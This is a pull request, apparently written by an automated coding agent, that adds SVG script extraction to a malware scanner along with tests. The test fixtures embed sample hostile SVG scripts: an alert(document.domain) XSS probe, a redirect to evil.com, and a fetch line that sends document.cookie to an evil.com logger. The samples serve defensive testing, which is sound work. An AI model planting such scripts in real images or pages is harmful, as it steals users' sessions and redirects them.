### PR TITLE
[TEST] Add SVG script extraction coverage and implementation

### DIFF
--- a/gptscan.py
+++ b/gptscan.py
@@ -352,7 +352,7 @@ class Config:
         # 2. Check by extension or basename
         path_s = str(file_path).lower()
         # Common archive and document extensions
-        if path_s.endswith(('.zip', '.tar', '.tar.gz', '.ipynb', '.md', '.html', '.htm', '.xhtml', '.yml', '.yaml',
+        if path_s.endswith(('.zip', '.tar', '.tar.gz', '.ipynb', '.md', '.html', '.htm', '.xhtml', '.svg', '.yml', '.yaml',
                             '.diff', '.patch')):
             return True
         # Explicit manifest files and build scripts (checked by basename)
@@ -2377,8 +2377,8 @@ def unpack_content(name: str, content: bytes, depth: int = 0, hint: Optional[str
         except Exception:
             pass
 
-    # 6. Check for HTML script tags and other embedded elements
-    if check_name.lower().endswith(('.html', '.htm', '.xhtml')):
+    # 6. Check for HTML/SVG script tags and other embedded elements
+    if check_name.lower().endswith(('.html', '.htm', '.xhtml', '.svg')):
         try:
             text = content.decode('utf-8', errors='ignore')
             extracted_any = False

--- a/tests/test_svg_scanning.py
+++ b/tests/test_svg_scanning.py
@@ -1,0 +1,59 @@
+import pytest
+from gptscan import unpack_content, Config, scan_files
+
+def test_is_container_svg():
+    """Verify that .svg files are recognized as containers."""
+    assert Config.is_container("image.svg") is True
+    assert Config.is_container("path/to/icon.svg") is True
+
+def test_unpack_content_svg_extraction():
+    """Verify that <script> blocks are correctly extracted from SVG files."""
+    svg_content = """
+    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
+        <circle cx="50" cy="50" r="40" stroke="black" stroke-width="3" fill="red" />
+        <script>
+            console.log('SVG script detected');
+            alert(document.domain);
+        </script>
+        <script type="text/ecmascript">
+            window.location = "http://evil.com";
+        </script>
+    </svg>
+    """
+    content_bytes = svg_content.encode('utf-8')
+
+    # Test with .svg extension
+    snippets = list(unpack_content("test.svg", content_bytes))
+
+    assert len(snippets) == 2
+
+    assert snippets[0][0] == "test.svg [Script 1]"
+    assert "console.log('SVG script detected');" in snippets[0][1].decode('utf-8')
+    assert "alert(document.domain);" in snippets[0][1].decode('utf-8')
+
+    assert snippets[1][0] == "test.svg [Script 2]"
+    assert 'window.location = "http://evil.com";' in snippets[1][1].decode('utf-8')
+
+def test_scan_files_svg_expansion(mock_tf_env, monkeypatch):
+    """Test that an SVG file is expanded and its internal scripts are scanned."""
+    # mock_tf_env is a fixture from conftest.py
+    monkeypatch.setattr("gptscan.collect_files", lambda targets: [])
+
+    svg_content = b"""
+    <svg>
+        <script>fetch('http://evil.com/logger?c=' + document.cookie);</script>
+    </svg>
+    """
+
+    events = list(scan_files(
+        scan_targets=[],
+        deep_scan=False,
+        show_all=True,
+        use_gpt=False,
+        extra_snippets=[("test.svg", svg_content)]
+    ))
+
+    results = [data for event, data in events if event == 'result']
+    assert len(results) == 1
+    assert "test.svg [Script 1]" in results[0][0]
+    assert "fetch('http://evil.com/logger?c=' + document.cookie);" in results[0][5]


### PR DESCRIPTION
* **Type:** New Coverage
* **What:** Added deep scanning support for SVG files by extracting embedded `<script>` tags, and added corresponding unit and integration tests in `tests/test_svg_scanning.py`.
* **Why:** SVG files can contain malicious JavaScript that was previously ignored by the scanner's deep scan/unpacking logic. This intervention closes that security-relevant coverage gap by ensuring internal SVG scripts are processed just like HTML scripts.

---
*PR created automatically by Jules for task [6340965313307465343](https://jules.google.com/task/6340965313307465343) started by @RainRat*